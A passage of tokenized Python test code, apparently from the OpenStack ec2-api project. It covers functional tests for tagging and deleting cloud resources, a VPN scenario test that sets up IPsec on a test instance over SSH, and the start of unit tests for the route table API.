_test_tag_resource ( instance_id , '<STR_LIT>' , describe_func ) <EOL> self . client . terminate_instances ( InstanceIds = [ instance_id ] ) <EOL> self . get_instance_waiter ( ) . wait_delete ( instance_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_internet_gateway ( self ) : <EOL> data = self . client . create_internet_gateway ( ) <EOL> gw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( <EOL> self . client . delete_internet_gateway , InternetGatewayId = gw_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_internet_gateways ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( gw_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( gw_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_internet_gateway ( InternetGatewayId = gw_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_network_interface ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_subnet ( VpcId = vpc_id , <EOL> CidrBlock = cidr ) <EOL> subnet_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> subnet_clean = self . addResourceCleanUp ( self . client . delete_subnet , <EOL> SubnetId = subnet_id ) <EOL> data = self . client . create_network_interface ( SubnetId = subnet_id , <EOL> Description = data_utils . rand_name ( '<STR_LIT>' ) ) <EOL> ni_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( <EOL> self . client . delete_network_interface , NetworkInterfaceId = ni_id ) <EOL> self . get_network_interface_waiter ( ) . 
wait_available ( ni_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_network_interfaces ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( ni_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( ni_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_network_interface ( NetworkInterfaceId = ni_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . get_network_interface_waiter ( ) . wait_delete ( ni_id ) <EOL> self . client . delete_subnet ( SubnetId = subnet_id ) <EOL> self . cancelResourceCleanUp ( subnet_clean ) <EOL> self . get_subnet_waiter ( ) . wait_delete ( subnet_id ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_route_table ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> data = self . client . create_route_table ( VpcId = vpc_id ) <EOL> rt_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_route_table , <EOL> RouteTableId = rt_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_route_tables ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( rt_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( rt_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_route_table ( RouteTableId = rt_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . client . 
delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_security_group ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> desc = data_utils . rand_name ( '<STR_LIT>' ) <EOL> data = self . client . create_security_group ( VpcId = vpc_id , <EOL> GroupName = name , <EOL> Description = desc ) <EOL> group_id = data [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_security_group , <EOL> GroupId = group_id ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_security_groups ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( group_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( group_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_security_group ( GroupId = group_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> def test_tag_snapshot ( self ) : <EOL> data = self . client . create_snapshot ( VolumeId = self . volume_id ) <EOL> snapshot_id = data [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_snapshot , <EOL> SnapshotId = snapshot_id ) <EOL> self . get_snapshot_waiter ( ) . wait_available ( snapshot_id , <EOL> final_set = ( '<STR_LIT>' ) ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . 
describe_snapshots ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( snapshot_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( snapshot_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_snapshot ( SnapshotId = snapshot_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . get_snapshot_waiter ( ) . wait_delete ( snapshot_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_subnet ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_subnet ( VpcId = vpc_id , <EOL> CidrBlock = cidr ) <EOL> subnet_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_subnet , <EOL> SubnetId = subnet_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_subnets ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( subnet_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( subnet_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_subnet ( SubnetId = subnet_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> self . get_subnet_waiter ( ) . wait_delete ( subnet_id ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_vpc ( self ) : <EOL> cidr = '<STR_LIT>' <EOL> data = self . client . create_vpc ( CidrBlock = cidr ) <EOL> vpc_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> dv_clean = self . 
addResourceCleanUp ( <EOL> self . client . delete_vpc , VpcId = vpc_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_vpcs ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( vpc_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( vpc_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_vpc ( VpcId = vpc_id ) <EOL> self . cancelResourceCleanUp ( dv_clean ) <EOL> self . get_vpc_waiter ( ) . wait_delete ( vpc_id ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_customer_gateway ( self ) : <EOL> data = self . client . create_customer_gateway ( <EOL> Type = '<STR_LIT>' , PublicIp = '<STR_LIT>' , BgpAsn = <NUM_LIT> ) <EOL> cgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_customer_gateway , <EOL> CustomerGatewayId = cgw_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_customer_gateways ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( cgw_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( cgw_id , '<STR_LIT>' , describe_func ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_vpn_gateway ( self ) : <EOL> data = self . client . create_vpn_gateway ( Type = '<STR_LIT>' ) <EOL> vgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_vpn_gateway , <EOL> VpnGatewayId = vgw_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_vpn_gateways ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( vgw_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . 
_test_tag_resource ( vgw_id , '<STR_LIT>' , describe_func ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_vpn_connection ( self ) : <EOL> data = self . client . create_customer_gateway ( <EOL> Type = '<STR_LIT>' , PublicIp = '<STR_LIT>' , BgpAsn = <NUM_LIT> ) <EOL> cgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_customer_gateway , <EOL> CustomerGatewayId = cgw_id ) <EOL> data = self . client . create_vpn_gateway ( Type = '<STR_LIT>' ) <EOL> vgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_vpn_gateway , <EOL> VpnGatewayId = vgw_id ) <EOL> data = self . client . create_vpn_connection ( <EOL> CustomerGatewayId = cgw_id , VpnGatewayId = vgw_id , <EOL> Options = { '<STR_LIT>' : True } , Type = '<STR_LIT>' ) <EOL> vpn_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> vpn_clean = self . addResourceCleanUp ( self . client . delete_vpn_connection , <EOL> VpnConnectionId = vpn_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_vpn_connections ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( vpn_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( vpn_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_vpn_connection ( VpnConnectionId = vpn_id ) <EOL> vpn_waiter = self . get_vpn_connection_waiter ( ) <EOL> self . cancelResourceCleanUp ( vpn_clean ) <EOL> vpn_waiter . wait_delete ( vpn_id ) </s>
<s> import os <EOL> import sys <EOL> import time <EOL> import urllib2 <EOL> from lxml import etree <EOL> from oslo_log import log <EOL> import paramiko <EOL> from tempest . lib . common import ssh <EOL> from tempest . lib . common . utils import data_utils <EOL> import testtools <EOL> from ec2api . tests . functional import base <EOL> from ec2api . tests . functional import config <EOL> from ec2api . tests . functional . scenario import base as scenario_base <EOL> CONF = config . CONF <EOL> LOG = log . getLogger ( __name__ ) <EOL> class VpnTest ( scenario_base . BaseScenarioTest ) : <EOL> CUSTOMER_GATEWAY_IP = '<STR_LIT>' <EOL> CUSTOMER_VPN_CIDR = '<STR_LIT>' <EOL> OPENSWAN_LINK = ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ classmethod <EOL> @ base . safe_setup <EOL> def setUpClass ( cls ) : <EOL> super ( VpnTest , cls ) . setUpClass ( ) <EOL> if not base . TesterStateHolder ( ) . get_vpc_enabled ( ) : <EOL> raise cls . skipException ( '<STR_LIT>' ) <EOL> def test_vpn_routing ( self ) : <EOL> vpc_id , _subnet_id = self . create_vpc_and_subnet ( '<STR_LIT>' ) <EOL> vpn_data = self . _create_and_configure_vpn ( <EOL> vpc_id , self . CUSTOMER_GATEWAY_IP , self . CUSTOMER_VPN_CIDR ) <EOL> vgw_id = vpn_data [ '<STR_LIT>' ] <EOL> data = self . client . describe_route_tables ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ vpc_id ] } ] ) <EOL> rtb_id = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> data = self . client . describe_route_tables ( RouteTableIds = [ rtb_id ] ) <EOL> data = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> route = next ( ( r for r in data [ '<STR_LIT>' ] <EOL> if r [ '<STR_LIT>' ] == self . CUSTOMER_VPN_CIDR ) , <EOL> None ) <EOL> if route : <EOL> self . assertEqual ( '<STR_LIT>' , route [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , route [ '<STR_LIT>' ] ) <EOL> self . assertIn ( '<STR_LIT>' , data ) <EOL> self . assertNotEmpty ( data [ '<STR_LIT>' ] ) <EOL> self . 
assertEqual ( vgw_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> @ testtools . skipUnless ( CONF . aws . run_ssh , '<STR_LIT>' ) <EOL> @ testtools . skipUnless ( CONF . aws . run_long_tests , '<STR_LIT>' ) <EOL> @ testtools . skipUnless ( CONF . aws . image_id_ubuntu , <EOL> "<STR_LIT>" ) <EOL> @ testtools . skipUnless ( CONF . aws . image_id , <EOL> "<STR_LIT>" ) <EOL> def test_vpn_connectivity ( self ) : <EOL> is_amazon = '<STR_LIT>' in CONF . aws . ec2_url <EOL> response = urllib2 . urlopen ( self . OPENSWAN_LINK , timeout = <NUM_LIT:30> ) <EOL> content = response . read ( ) <EOL> if not is_amazon : <EOL> filename = os . path . basename ( self . OPENSWAN_LINK ) <EOL> f = open ( filename , '<STR_LIT:w>' ) <EOL> f . write ( content ) <EOL> f . close ( ) <EOL> key_name = data_utils . rand_name ( '<STR_LIT>' ) <EOL> pkey = self . create_key_pair ( key_name ) <EOL> sec_group_name = self . create_standard_security_group ( ) <EOL> instance_id_ubuntu = self . run_instance ( <EOL> KeyName = key_name , ImageId = CONF . aws . image_id_ubuntu , <EOL> SecurityGroups = [ sec_group_name ] ) <EOL> public_ip_ubuntu = self . get_instance_ip ( instance_id_ubuntu ) <EOL> instance = self . get_instance ( instance_id_ubuntu ) <EOL> private_ip_ubuntu = instance [ '<STR_LIT>' ] <EOL> vpc_id , subnet_id = self . create_vpc_and_subnet ( '<STR_LIT>' ) <EOL> self . prepare_vpc_default_security_group ( vpc_id ) <EOL> vpn_data = self . _create_and_configure_vpn ( <EOL> vpc_id , public_ip_ubuntu , private_ip_ubuntu + '<STR_LIT>' ) <EOL> instance_id = self . run_instance ( KeyName = key_name , <EOL> ImageId = CONF . aws . image_id , <EOL> SubnetId = subnet_id ) <EOL> instance = self . get_instance ( instance_id ) <EOL> private_ip_in_vpc = instance [ '<STR_LIT>' ] <EOL> ssh_client = ssh . Client ( public_ip_ubuntu , CONF . aws . image_user_ubuntu , <EOL> pkey = pkey ) <EOL> if not is_amazon : <EOL> self . _upload_file ( ssh_client , filename , filename ) <EOL> ssh_client . 
exec_command ( '<STR_LIT>' <EOL> '<STR_LIT>' + filename ) <EOL> else : <EOL> ssh_client . exec_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ssh_client . exec_command ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> ssh_client . exec_command ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sysctl_additions = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> for item in sysctl_additions : <EOL> ssh_client . exec_command ( <EOL> '<STR_LIT>' + item + '<STR_LIT>' ) <EOL> ssh_client . exec_command ( '<STR_LIT>' ) <EOL> ipsec_conf , ipsec_secrets = self . _get_ipsec_conf ( <EOL> vpn_data [ '<STR_LIT>' ] , private_ip_ubuntu ) <EOL> ssh_client . exec_command ( '<STR_LIT>' ) <EOL> for fstr in ipsec_conf : <EOL> ssh_client . exec_command ( <EOL> '<STR_LIT>' % fstr ) <EOL> ssh_client . exec_command ( <EOL> '<STR_LIT>' % ipsec_secrets ) <EOL> ssh_client . exec_command ( '<STR_LIT>' ) <EOL> try : <EOL> self . get_vpn_connection_tunnel_waiter ( ) . wait_available ( <EOL> vpn_data [ '<STR_LIT>' ] , ( '<STR_LIT>' ) ) <EOL> except Exception : <EOL> exc_info = sys . exc_info ( ) <EOL> try : <EOL> output = ssh_client . exec_command ( '<STR_LIT>' ) <EOL> LOG . warning ( output ) <EOL> except Exception : <EOL> pass <EOL> raise exc_info [ <NUM_LIT:1> ] , None , exc_info [ <NUM_LIT:2> ] <EOL> time . sleep ( <NUM_LIT:10> ) <EOL> ssh_client . exec_command ( '<STR_LIT>' % private_ip_in_vpc ) <EOL> def _upload_file ( self , ssh_client , local_path , remote_path ) : <EOL> ssh = ssh_client . _get_ssh_connection ( ) <EOL> transport = ssh . get_transport ( ) <EOL> sftp_client = paramiko . SFTPClient . from_transport ( transport ) <EOL> sftp_client . put ( local_path , remote_path ) <EOL> def _create_and_configure_vpn ( self , vpc_id , cgw_ip , customer_subnet ) : <EOL> data = self . client . create_customer_gateway ( <EOL> Type = '<STR_LIT>' , PublicIp = cgw_ip , BgpAsn = <NUM_LIT> ) <EOL> cgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . 
addResourceCleanUp ( <EOL> self . client . delete_customer_gateway , CustomerGatewayId = cgw_id ) <EOL> self . get_customer_gateway_waiter ( ) . wait_available ( cgw_id ) <EOL> data = self . client . create_vpn_gateway ( <EOL> Type = '<STR_LIT>' , AvailabilityZone = CONF . aws . aws_zone ) <EOL> vgw_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( <EOL> self . client . delete_vpn_gateway , VpnGatewayId = vgw_id ) <EOL> self . get_vpn_gateway_waiter ( ) . wait_available ( vgw_id ) <EOL> data = self . client . attach_vpn_gateway ( VpnGatewayId = vgw_id , <EOL> VpcId = vpc_id ) <EOL> self . addResourceCleanUp ( self . client . detach_vpn_gateway , <EOL> VpnGatewayId = vgw_id , VpcId = vpc_id ) <EOL> self . get_vpn_gateway_attachment_waiter ( ) . wait_available ( <EOL> vgw_id , '<STR_LIT>' ) <EOL> data = self . client . describe_route_tables ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ vpc_id ] } ] ) <EOL> rtb_id = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> data = self . client . enable_vgw_route_propagation ( RouteTableId = rtb_id , <EOL> GatewayId = vgw_id ) <EOL> self . addResourceCleanUp ( self . client . disable_vgw_route_propagation , <EOL> RouteTableId = rtb_id , GatewayId = vgw_id ) <EOL> data = self . client . create_vpn_connection ( <EOL> CustomerGatewayId = cgw_id , VpnGatewayId = vgw_id , <EOL> Options = { '<STR_LIT>' : True } , Type = '<STR_LIT>' ) <EOL> vpn_data = data [ '<STR_LIT>' ] <EOL> vpn_id = data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> self . addResourceCleanUp ( self . client . delete_vpn_connection , <EOL> VpnConnectionId = vpn_id ) <EOL> self . get_vpn_connection_waiter ( ) . wait_available ( vpn_id ) <EOL> data = self . client . create_vpn_connection_route ( <EOL> VpnConnectionId = vpn_id , <EOL> DestinationCidrBlock = customer_subnet ) <EOL> self . get_vpn_connection_route_waiter ( customer_subnet ) . 
wait_available ( <EOL> vpn_id ) <EOL> return vpn_data <EOL> def _get_ipsec_conf ( self , vpn_connection_id , private_ip_ubuntu ) : <EOL> data = self . client . describe_vpn_connections ( <EOL> VpnConnectionIds = [ vpn_connection_id ] ) <EOL> vpn_data = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> vpn_config = etree . fromstring ( <EOL> vpn_data [ '<STR_LIT>' ] ) <EOL> psks = vpn_config . xpath ( <EOL> '<STR_LIT>' ) <EOL> self . assertNotEmpty ( psks ) <EOL> vgw_ip = vpn_config . xpath ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . assertTrue ( vgw_ip ) <EOL> ipsec_key = psks [ <NUM_LIT:0> ] . text <EOL> vgw_ip = vgw_ip [ <NUM_LIT:0> ] . text <EOL> ipsec_conf = [ ] <EOL> for item in self . _ipsec_conf : <EOL> ipsec_conf . append ( item % { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : vgw_ip , <EOL> '<STR_LIT>' : private_ip_ubuntu } ) <EOL> ipsec_secrets = ( '<STR_LIT>' <EOL> '<STR_LIT>' % { <EOL> '<STR_LIT>' : private_ip_ubuntu , <EOL> '<STR_LIT>' : vgw_ip , <EOL> '<STR_LIT>' : ipsec_key } ) <EOL> return ipsec_conf , ipsec_secrets <EOL> _ipsec_conf = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] </s>
<s> import copy <EOL> import mock <EOL> from oslotest import base as test_base <EOL> from ec2api . api import common <EOL> from ec2api . api import ec2utils <EOL> from ec2api . api import route_table as route_table_api <EOL> from ec2api import exception <EOL> from ec2api . tests . unit import base <EOL> from ec2api . tests . unit import fakes <EOL> from ec2api . tests . unit import matchers <EOL> from ec2api . tests . unit import tools <EOL> class RouteTableTestCase ( base . ApiTestCase ) : <EOL> def test_route_table_create ( self ) : <EOL> self . set_mock_db_items ( fakes . DB_VPC_1 ) <EOL> self . db_api . add_item . side_effect = ( <EOL> tools . get_db_api_add_item ( fakes . ID_EC2_ROUTE_TABLE_1 ) ) <EOL> resp = self . execute ( '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_1 } ) <EOL> self . assertThat ( <EOL> resp [ '<STR_LIT>' ] , <EOL> matchers . DictMatches ( tools . purge_dict ( fakes . EC2_ROUTE_TABLE_1 , <EOL> ( '<STR_LIT>' , ) ) ) ) <EOL> self . db_api . add_item . assert_called_once_with ( <EOL> mock . ANY , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_1 , <EOL> '<STR_LIT>' : [ { '<STR_LIT>' : fakes . CIDR_VPC_1 , <EOL> '<STR_LIT>' : None } ] } ) <EOL> self . db_api . get_item_by_id . assert_called_once_with ( <EOL> mock . ANY , fakes . ID_EC2_VPC_1 ) <EOL> def test_route_table_create_invalid_parameters ( self ) : <EOL> self . set_mock_db_items ( ) <EOL> self . assert_execution_error ( <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : fakes . ID_EC2_VPC_1 } ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> def test_create_route ( self , routes_updater ) : <EOL> self . set_mock_db_items ( <EOL> fakes . DB_ROUTE_TABLE_1 , fakes . DB_ROUTE_TABLE_2 , <EOL> fakes . DB_VPC_1 , fakes . DB_IGW_1 , fakes . DB_VPN_GATEWAY_1 , <EOL> fakes . DB_NETWORK_INTERFACE_1 , fakes . DB_NETWORK_INTERFACE_2 ) <EOL> def do_check ( params , route_table , rollback_route_table_state , <EOL> update_target = route_table_api . 
HOST_TARGET ) : <EOL> resp = self . execute ( '<STR_LIT>' , params ) <EOL> self . assertEqual ( True , resp [ '<STR_LIT>' ] ) <EOL> self . db_api . update_item . assert_called_once_with ( <EOL> mock . ANY , route_table ) <EOL> routes_updater . assert_called_once_with ( <EOL> mock . ANY , mock . ANY , route_table , <EOL> update_target = update_target ) <EOL> self . db_api . update_item . reset_mock ( ) <EOL> routes_updater . reset_mock ( ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : fakes . ID_EC2_IGW_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> route_table , fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_VPN_GATEWAY_1 } , <EOL> route_table , fakes . DB_ROUTE_TABLE_1 , <EOL> update_target = route_table_api . VPN_TARGET ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_1 } , <EOL> route_table , fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table = copy . deepcopy ( fakes . DB_ROUTE_TABLE_1 ) <EOL> route_table [ '<STR_LIT>' ] . append ( { <EOL> '<STR_LIT>' : fakes . ID_EC2_NETWORK_INTERFACE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> do_check ( { '<STR_LIT>' : fakes . 
ID_EC2_ROUTE_TABLE_1 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_1 } , <EOL> route_table , fakes . DB_ROUTE_TABLE_1 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : fakes . CIDR_EXTERNAL_NETWORK , <EOL> '<STR_LIT>' : fakes . ID_EC2_INSTANCE_1 } , <EOL> fakes . DB_ROUTE_TABLE_2 , fakes . DB_ROUTE_TABLE_2 ) <EOL> do_check ( { '<STR_LIT>' : fakes . ID_EC2_ROUTE_TABLE_2 , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : fakes . ID_EC2_IGW_1 } , <EOL> fakes . DB_ROUTE_TABLE_2 , fakes . DB_ROUTE_TABLE_2 ) <EOL> def test_create_route_invalid_parameters ( self ) : <EOL> id_ec2_eni_vpc_2 = fakes . random_ec2_id ( '<STR_LIT>' ) <EOL> eni_vpc_2 = fakes . gen_db_network_interface ( <EOL> id_ec2_eni_vpc_2 , fakes . random_os_id ( ) , <EOL> fakes . ID_EC2_VPC_2 , fakes . random_ec2_id ( '<STR_LIT>' ) , '<STR_LIT>' , <EOL> instance_id = fakes . ID_EC2_INSTANCE_2 ) <EOL> eni_2_in_instance_1 = fakes . gen_db_network_interface ( 